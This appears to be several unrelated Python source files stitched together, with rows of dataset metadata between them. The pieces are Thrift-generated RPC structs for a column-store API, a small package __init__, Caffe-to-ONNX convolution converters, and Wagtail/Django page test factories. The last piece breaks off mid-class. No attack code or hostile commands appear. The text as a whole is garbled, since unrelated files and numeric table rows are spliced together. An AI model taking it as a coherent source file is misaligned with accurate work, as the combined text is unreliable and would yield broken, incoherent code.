  def __init__(self, d=None):
    # Fields may be seeded from an optional dict keyed by field name.
    self.tablename = None
    self.key = None
    self.columnFamily = None
    if isinstance(d, dict):
      if 'tablename' in d:
        self.tablename = d['tablename']
      if 'key' in d:
        self.key = d['key']
      if 'columnFamily' in d:
        self.columnFamily = d['columnFamily']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == -1:
        if ftype == TType.STRING:
          self.tablename = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -2:
        if ftype == TType.STRING:
          self.key = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == -3:
        if ftype == TType.STRING:
          self.columnFamily = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_superColumn_args')
    if self.tablename is not None:
      oprot.writeFieldBegin('tablename', TType.STRING, -1)
      oprot.writeString(self.tablename)
      oprot.writeFieldEnd()
    if self.key is not None:
      oprot.writeFieldBegin('key', TType.STRING, -2)
      oprot.writeString(self.key)
      oprot.writeFieldEnd()
    if self.columnFamily is not None:
      oprot.writeFieldBegin('columnFamily', TType.STRING, -3)
      oprot.writeString(self.columnFamily)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_superColumn_result:
  """Thrift result struct for the get_superColumn RPC; success is a superColumn_t."""
  thrift_spec = (
    (0, TType.STRUCT, 'success', (superColumn_t, superColumn_t.thrift_spec), None, ), # 0
  )
  def __init__(self, d=None):
    # Optionally seed the success field from a dict keyed by field name.
    self.success = None
    if isinstance(d, dict):
      if 'success' in d:
        self.success = d['success']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = superColumn_t()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_superColumn_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class batch_insert_superColumn_args:
  """Thrift argument struct for batch_insert_superColumn; wraps one batch_mutation_super_t.

  The single field uses a negative id, so no thrift_spec tuple exists and
  the accelerated (fastbinary) path is never taken for this struct.
  """
  thrift_spec = None
  def __init__(self, d=None):
    # The field may be seeded from an optional dict keyed by field name.
    self.batchMutationSuper = None
    if isinstance(d, dict):
      if 'batchMutationSuper' in d:
        self.batchMutationSuper = d['batchMutationSuper']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == -1:
        if ftype == TType.STRUCT:
          self.batchMutationSuper = batch_mutation_super_t()
          self.batchMutationSuper.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('batch_insert_superColumn_args')
    if self.batchMutationSuper is not None:
      oprot.writeFieldBegin('batchMutationSuper', TType.STRUCT, -1)
      self.batchMutationSuper.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class batch_insert_superColumn_result:
  """Fieldless Thrift result struct acknowledging the batch_insert_superColumn RPC."""
  thrift_spec = (
  )
  def __init__(self, d=None):
    # No fields to initialize; the optional dict argument is ignored.
    pass
  def read(self, iprot):
    """Consume a (fieldless) struct from iprot, skipping any fields present."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      _name, field_type, field_id = iprot.readFieldBegin()
      if field_type == TType.STOP:
        break
      iprot.skip(field_type)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Emit an empty struct to oprot."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('batch_insert_superColumn_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class batch_insert_superColumn_blocking_args:
  """Thrift argument struct for batch_insert_superColumn_blocking; wraps one batch_mutation_super_t.

  The single field uses a negative id, so no thrift_spec tuple exists and
  the accelerated (fastbinary) path is never taken for this struct.
  """
  thrift_spec = None
  def __init__(self, d=None):
    # The field may be seeded from an optional dict keyed by field name.
    self.batchMutationSuper = None
    if isinstance(d, dict):
      if 'batchMutationSuper' in d:
        self.batchMutationSuper = d['batchMutationSuper']
  def read(self, iprot):
    """Deserialize this struct from iprot, skipping unrecognized fields."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == -1:
        if ftype == TType.STRUCT:
          self.batchMutationSuper = batch_mutation_super_t()
          self.batchMutationSuper.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('batch_insert_superColumn_blocking_args')
    if self.batchMutationSuper is not None:
      oprot.writeFieldBegin('batchMutationSuper', TType.STRUCT, -1)
      self.batchMutationSuper.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def __str__(self):
    return str(self.__dict__)
  def __repr__(self):
    return repr(self.__dict__)
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class batch_insert_superColumn_blocking_result:
    """Thrift result struct for batch_insert_superColumn_blocking.

    Carries one field, ``success`` (field id 0, type BOOL).
    """
    thrift_spec = (
        (0, TType.BOOL, 'success', None, None, ),  # 0
    )

    def __init__(self, d=None):
        # Optional dict initializer mirrors the generated-code convention.
        self.success = None
        if isinstance(d, dict):
            if 'success' in d:
                self.success = d['success']

    def read(self, iprot):
        """Populate this struct from the input protocol ``iprot``."""
        # Fast path: C-accelerated decoding when protocol/transport allow it.
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.BOOL:
                    # Stray trailing semicolon removed.
                    self.success = iprot.readBool()
                else:
                    iprot.skip(ftype)
            else:
                # Unknown field id: skip for forward compatibility.
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to the output protocol ``oprot``."""
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('batch_insert_superColumn_blocking_result')
        # PEP 8: identity comparison with None (was `!= None`).
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.BOOL, 0)
            oprot.writeBool(self.success)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def __str__(self):
        return str(self.__dict__)

    def __repr__(self):
        return repr(self.__dict__)

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
| 33.573982
| 188
| 0.687835
| 7,838
| 67,618
| 5.643532
| 0.021689
| 0.028033
| 0.030384
| 0.027264
| 0.943799
| 0.924379
| 0.904824
| 0.868585
| 0.847583
| 0.826197
| 0
| 0.004026
| 0.206572
| 67,618
| 2,013
| 189
| 33.590661
| 0.820466
| 0.001982
| 0
| 0.868391
| 1
| 0
| 0.038522
| 0.009634
| 0
| 0
| 0
| 0
| 0
| 1
| 0.13046
| false
| 0.00977
| 0.004023
| 0.055172
| 0.258621
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
03cc3c08df3daf1e61912158bf07ef439f313b1a
| 108
|
py
|
Python
|
mydlib/__init__.py
|
anuragmaurya/dglib
|
cdce5033b5d256eba86d5d12277304d1865fa2c2
|
[
"MIT"
] | 1
|
2020-07-27T23:51:44.000Z
|
2020-07-27T23:51:44.000Z
|
mydlib/__init__.py
|
anuragmaurya/dglib
|
cdce5033b5d256eba86d5d12277304d1865fa2c2
|
[
"MIT"
] | null | null | null |
mydlib/__init__.py
|
anuragmaurya/dglib
|
cdce5033b5d256eba86d5d12277304d1865fa2c2
|
[
"MIT"
] | null | null | null |
from .mydlib import create_catalogue
from .mydlib import create_library
from .mydlib import get_book_libgen
| 27
| 36
| 0.861111
| 16
| 108
| 5.5625
| 0.5625
| 0.337079
| 0.539326
| 0.494382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 108
| 3
| 37
| 36
| 0.927083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
456671a0b9c6d2935eaf0fe836764369156b29ef
| 7,654
|
py
|
Python
|
caffe-onnx/onnx_caffe/conv_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 33
|
2020-06-09T21:05:35.000Z
|
2022-02-24T01:48:45.000Z
|
caffe-onnx/onnx_caffe/conv_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 17
|
2020-07-14T19:44:09.000Z
|
2022-02-10T10:03:01.000Z
|
caffe-onnx/onnx_caffe/conv_layers.py
|
jwj04ok/ONNX_Convertor
|
067a17e16dfc8aa80e36f44c4523959daf7359f5
|
[
"MIT"
] | 16
|
2020-06-17T22:56:11.000Z
|
2021-12-21T05:44:32.000Z
|
"""Converters for convolution layers in Keras
"""
import onnx as O
import numpy as np
from . import helper
from .base_layer import Layer
from .exceptions import FeatureNotImplemented, OnnxNotSupport
class Convolution(Layer):
    """Converts a Caffe Convolution layer into an ONNX ``Conv`` node."""

    def __init__(self, inputs, outname, layer, proto, blob):
        Layer.__init__(self, inputs, outname, layer, proto, blob)

    def _append_constant_input(self, suffix, data, node_list, value_infos):
        # Emit a constant node for weight/bias data and register it as an
        # extra input of this layer.
        node_name = self.name + suffix
        tn, ti = helper.constructConstantNode(node_name, data)
        node_list += tn
        value_infos += ti
        self.inputs.append(node_name)

    def _conv_attributes(self):
        # Resolve kernel/pad/stride/dilation/group from the Caffe proto.
        # Explicit *_h/*_w fields take precedence over the repeated fields;
        # missing values fall back to kernel=1, pad=0, stride=1, dilation=1.
        param = self.proto.convolution_param
        if param.kernel_w > 0 and param.kernel_h > 0:
            kernel = [param.kernel_h, param.kernel_w]
        else:
            kernel = [param.kernel_size[0] if len(param.kernel_size) else 1] * 2
        if param.pad_w > 0 or param.pad_h > 0:
            pad = [param.pad_h, param.pad_w, param.pad_h, param.pad_w]
        else:
            pad = [param.pad[0] if len(param.pad) else 0] * 4
        if param.stride_w > 0 or param.stride_h > 0:
            stride = [param.stride_h, param.stride_w]
        else:
            stride = [param.stride[0] if len(param.stride) else 1] * 2
        dilation = [param.dilation[0] if len(param.dilation) else 1] * 2
        return kernel, pad, stride, dilation, param.group

    def generate(self):
        """Build and return (node_list, value_infos) for this layer."""
        node_list = []
        value_infos = []
        # Weights are always present; bias is optional per bias_term.
        self._append_constant_input(
            '_weight', self.layer.blobs[0].data, node_list, value_infos)
        # Idiomatic truthiness test (was `== True`).
        if self.proto.convolution_param.bias_term:
            self._append_constant_input(
                '_bias', self.layer.blobs[1].data, node_list, value_infos)
        kernel, pad, stride, dilation, group = self._conv_attributes()
        node = O.helper.make_node(
            op_type='Conv',
            inputs=self.inputs,
            outputs=self.outputs,
            name=self.name,
            dilations=dilation,
            kernel_shape=kernel,
            pads=pad,
            strides=stride,
            group=group
        )
        node_list.append(node)
        return node_list, value_infos
class DepthwiseConvolution(Layer):
    """Converts a Caffe depthwise Convolution layer into an ONNX ``Conv`` node.

    NOTE(review): the generated node is identical to the plain Convolution
    conversion — the ``group`` attribute is taken straight from the proto.
    """

    def __init__(self, inputs, outname, layer, proto, blob):
        Layer.__init__(self, inputs, outname, layer, proto, blob)

    def _append_constant_input(self, suffix, data, node_list, value_infos):
        # Emit a constant node for weight/bias data and register it as an
        # extra input of this layer.
        node_name = self.name + suffix
        tn, ti = helper.constructConstantNode(node_name, data)
        node_list += tn
        value_infos += ti
        self.inputs.append(node_name)

    def _conv_attributes(self):
        # Resolve kernel/pad/stride/dilation/group from the Caffe proto.
        # Explicit *_h/*_w fields take precedence over the repeated fields;
        # missing values fall back to kernel=1, pad=0, stride=1, dilation=1.
        param = self.proto.convolution_param
        if param.kernel_w > 0 and param.kernel_h > 0:
            kernel = [param.kernel_h, param.kernel_w]
        else:
            kernel = [param.kernel_size[0] if len(param.kernel_size) else 1] * 2
        if param.pad_w > 0 or param.pad_h > 0:
            pad = [param.pad_h, param.pad_w, param.pad_h, param.pad_w]
        else:
            pad = [param.pad[0] if len(param.pad) else 0] * 4
        if param.stride_w > 0 or param.stride_h > 0:
            stride = [param.stride_h, param.stride_w]
        else:
            stride = [param.stride[0] if len(param.stride) else 1] * 2
        dilation = [param.dilation[0] if len(param.dilation) else 1] * 2
        return kernel, pad, stride, dilation, param.group

    def generate(self):
        """Build and return (node_list, value_infos) for this layer."""
        node_list = []
        value_infos = []
        # Weights are always present; bias is optional per bias_term.
        self._append_constant_input(
            '_weight', self.layer.blobs[0].data, node_list, value_infos)
        # Idiomatic truthiness test (was `== True`).
        if self.proto.convolution_param.bias_term:
            self._append_constant_input(
                '_bias', self.layer.blobs[1].data, node_list, value_infos)
        kernel, pad, stride, dilation, group = self._conv_attributes()
        node = O.helper.make_node(
            op_type='Conv',
            inputs=self.inputs,
            outputs=self.outputs,
            name=self.name,
            dilations=dilation,
            kernel_shape=kernel,
            pads=pad,
            strides=stride,
            group=group
        )
        node_list.append(node)
        return node_list, value_infos
class Deconvolution(Layer):
    """Converts a Caffe Deconvolution layer into an ONNX ``ConvTranspose`` node."""

    def __init__(self, inputs, outname, layer, proto, blob):
        Layer.__init__(self, inputs, outname, layer, proto, blob)

    def _append_constant_input(self, suffix, data, node_list, value_infos):
        # Emit a constant node for weight/bias data and register it as an
        # extra input of this layer.
        node_name = self.name + suffix
        tn, ti = helper.constructConstantNode(node_name, data)
        node_list += tn
        value_infos += ti
        self.inputs.append(node_name)

    def _conv_attributes(self):
        # Resolve kernel/pad/stride/dilation/group from the Caffe proto.
        # Explicit *_h/*_w fields take precedence over the repeated fields;
        # missing values fall back to kernel=1, pad=0, stride=1, dilation=1.
        param = self.proto.convolution_param
        if param.kernel_w > 0 and param.kernel_h > 0:
            kernel = [param.kernel_h, param.kernel_w]
        else:
            kernel = [param.kernel_size[0] if len(param.kernel_size) else 1] * 2
        if param.pad_w > 0 or param.pad_h > 0:
            pad = [param.pad_h, param.pad_w, param.pad_h, param.pad_w]
        else:
            pad = [param.pad[0] if len(param.pad) else 0] * 4
        if param.stride_w > 0 or param.stride_h > 0:
            stride = [param.stride_h, param.stride_w]
        else:
            stride = [param.stride[0] if len(param.stride) else 1] * 2
        dilation = [param.dilation[0] if len(param.dilation) else 1] * 2
        return kernel, pad, stride, dilation, param.group

    def generate(self):
        """Build and return (node_list, value_infos) for this layer."""
        node_list = []
        value_infos = []
        # Weights are always present; bias is optional per bias_term.
        self._append_constant_input(
            '_weight', self.layer.blobs[0].data, node_list, value_infos)
        # Idiomatic truthiness test (was `== True`).
        if self.proto.convolution_param.bias_term:
            self._append_constant_input(
                '_bias', self.layer.blobs[1].data, node_list, value_infos)
        kernel, pad, stride, dilation, group = self._conv_attributes()
        node = O.helper.make_node(
            op_type='ConvTranspose',
            inputs=self.inputs,
            outputs=self.outputs,
            name=self.name,
            dilations=dilation,
            kernel_shape=kernel,
            pads=pad,
            strides=stride,
            group=group
        )
        node_list.append(node)
        return node_list, value_infos
| 36.447619
| 156
| 0.66057
| 996
| 7,654
| 4.86747
| 0.080321
| 0.133663
| 0.29703
| 0.371287
| 0.954208
| 0.954208
| 0.954208
| 0.954208
| 0.954208
| 0.954208
| 0
| 0.010269
| 0.236608
| 7,654
| 209
| 157
| 36.62201
| 0.819442
| 0.027959
| 0
| 0.934066
| 0
| 0
| 0.007677
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032967
| false
| 0
| 0.027473
| 0
| 0.093407
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
45be1b8ecbef77934a969801d3fa8baf6e33e2d0
| 34,189
|
py
|
Python
|
tests/great_international/factories.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 6
|
2018-03-20T11:19:07.000Z
|
2021-10-05T07:53:11.000Z
|
tests/great_international/factories.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 802
|
2018-02-05T14:16:13.000Z
|
2022-02-10T10:59:21.000Z
|
tests/great_international/factories.py
|
uktrade/directory-cms
|
8c8d13ce29ea74ddce7a40f3dd29c8847145d549
|
[
"MIT"
] | 6
|
2019-01-22T13:19:37.000Z
|
2019-07-01T10:35:26.000Z
|
import random
import string
import factory
import factory.fuzzy
import wagtail_factories
from django.utils import timezone
from great_international import models
class InternationalSectorPageFactory(wagtail_factories.PageFactory):
    """Test factory for InternationalSectorPage with fuzzed content fields."""
    class Meta:
        model = models.great_international.InternationalSectorPage

    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # NOTE: evaluated once at import time, not per generated instance.
    last_published_at = timezone.now()
    parent = None
    heading = factory.fuzzy.FuzzyText(length=10)
    sub_heading = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    heading_teaser = factory.fuzzy.FuzzyText(length=10)
    section_one_body = factory.fuzzy.FuzzyText(length=10)
    section_one_image = factory.SubFactory(wagtail_factories.ImageFactory)
    section_one_image_caption = factory.fuzzy.FuzzyText(length=10)
    section_one_image_caption_company = factory.fuzzy.FuzzyText(length=10)
    statistic_1_number = factory.fuzzy.FuzzyText(length=10)
    statistic_1_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_1_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_2_number = factory.fuzzy.FuzzyText(length=10)
    statistic_2_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_2_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_3_number = factory.fuzzy.FuzzyText(length=10)
    statistic_3_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_3_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_4_number = factory.fuzzy.FuzzyText(length=10)
    statistic_4_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_4_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_5_number = factory.fuzzy.FuzzyText(length=10)
    statistic_5_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_5_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_6_number = factory.fuzzy.FuzzyText(length=10)
    statistic_6_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_6_smallprint = factory.fuzzy.FuzzyText(length=10)
    section_two_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_teaser = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_one_icon = factory.SubFactory(wagtail_factories.ImageFactory)
    section_two_subsection_one_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_one_body = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_two_icon = factory.SubFactory(wagtail_factories.ImageFactory)
    section_two_subsection_two_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_two_body = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_three_icon = factory.SubFactory(wagtail_factories.ImageFactory)
    section_two_subsection_three_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_three_body = factory.fuzzy.FuzzyText(length=10)
    case_study_title = factory.fuzzy.FuzzyText(length=10)
    case_study_description = factory.fuzzy.FuzzyText(length=10)
    case_study_cta_text = factory.fuzzy.FuzzyText(length=10)
    case_study_image = factory.SubFactory(wagtail_factories.ImageFactory)
    section_three_heading = factory.fuzzy.FuzzyText(length=10)
    section_three_teaser = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_one_heading = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_one_teaser = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_one_body = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_two_heading = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_two_teaser = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_two_body = factory.fuzzy.FuzzyText(length=10)
class InternationalSubSectorPageFactory(wagtail_factories.PageFactory):
    """Test factory for InternationalSubSectorPage with fuzzed content fields."""
    class Meta:
        model = models.great_international.InternationalSubSectorPage

    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # NOTE: evaluated once at import time, not per generated instance.
    last_published_at = timezone.now()
    parent = None
    heading = factory.fuzzy.FuzzyText(length=10)
    sub_heading = factory.fuzzy.FuzzyText(length=10)
    hero_image = factory.SubFactory(wagtail_factories.ImageFactory)
    heading_teaser = factory.fuzzy.FuzzyText(length=10)
    section_one_body = factory.fuzzy.FuzzyText(length=10)
    section_one_image = factory.SubFactory(wagtail_factories.ImageFactory)
    section_one_image_caption = factory.fuzzy.FuzzyText(length=10)
    section_one_image_caption_company = factory.fuzzy.FuzzyText(length=10)
    statistic_1_number = factory.fuzzy.FuzzyText(length=10)
    statistic_1_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_1_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_2_number = factory.fuzzy.FuzzyText(length=10)
    statistic_2_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_2_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_3_number = factory.fuzzy.FuzzyText(length=10)
    statistic_3_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_3_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_4_number = factory.fuzzy.FuzzyText(length=10)
    statistic_4_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_4_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_5_number = factory.fuzzy.FuzzyText(length=10)
    statistic_5_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_5_smallprint = factory.fuzzy.FuzzyText(length=10)
    statistic_6_number = factory.fuzzy.FuzzyText(length=10)
    statistic_6_heading = factory.fuzzy.FuzzyText(length=10)
    statistic_6_smallprint = factory.fuzzy.FuzzyText(length=10)
    section_two_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_teaser = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_one_icon = factory.SubFactory(wagtail_factories.ImageFactory)
    section_two_subsection_one_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_one_body = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_two_icon = factory.SubFactory(wagtail_factories.ImageFactory)
    section_two_subsection_two_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_two_body = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_three_icon = factory.SubFactory(wagtail_factories.ImageFactory)
    section_two_subsection_three_heading = factory.fuzzy.FuzzyText(length=10)
    section_two_subsection_three_body = factory.fuzzy.FuzzyText(length=10)
    case_study_title = factory.fuzzy.FuzzyText(length=10)
    case_study_description = factory.fuzzy.FuzzyText(length=10)
    case_study_cta_text = factory.fuzzy.FuzzyText(length=10)
    case_study_image = factory.SubFactory(wagtail_factories.ImageFactory)
    section_three_heading = factory.fuzzy.FuzzyText(length=10)
    section_three_teaser = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_one_heading = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_one_teaser = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_one_body = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_two_heading = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_two_teaser = factory.fuzzy.FuzzyText(length=10)
    section_three_subsection_two_body = factory.fuzzy.FuzzyText(length=10)
class InternationalHomePageFactory(wagtail_factories.PageFactory):
    """Test factory for InternationalHomePage."""
    class Meta:
        model = models.great_international.InternationalHomePage

    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    title_en_gb = factory.Sequence(lambda n: '123-555-{0}'.format(n))
    # NOTE: evaluated once at import time, not per generated instance.
    last_published_at = timezone.now()
    parent = None
    hero_title = factory.fuzzy.FuzzyText(length=10)
    # homepage_link_panels is a StreamField
class InternationalArticleListingPageFactory(wagtail_factories.PageFactory):
    """Test factory for InternationalArticleListingPage."""
    class Meta:
        model = models.great_international.InternationalArticleListingPage

    landing_page_title = factory.fuzzy.FuzzyText(length=10)
    slug = factory.Sequence(lambda n: '123-555-{0}'.format(n))
